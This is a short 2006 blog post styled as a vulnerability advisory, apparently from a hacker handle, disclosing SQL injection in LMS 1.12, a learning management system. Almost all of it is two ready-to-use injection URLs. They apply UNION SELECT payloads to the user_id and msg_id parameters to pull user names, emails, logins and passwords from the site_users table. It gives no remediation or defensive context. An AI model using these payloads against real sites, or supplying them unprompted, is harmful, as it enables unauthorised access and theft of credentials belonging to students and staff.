Thursday, September 28, 2006

LMS 1.12 Sql Injection

########################################
+Advisory #2
+LMS 1.12 Sql Injection
+Product :Learning Management Systems
+Develop :http://learning-management-system.info
+Vulnerable: SQL injection
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerables:

http://site/path/index.php?sub=students&action=edit&user_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users/*

http://site/path/index.php?sub=messages&action=det&msg_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users WHERE user_id=6/*

0 Comments:

Post a Comment

<< Home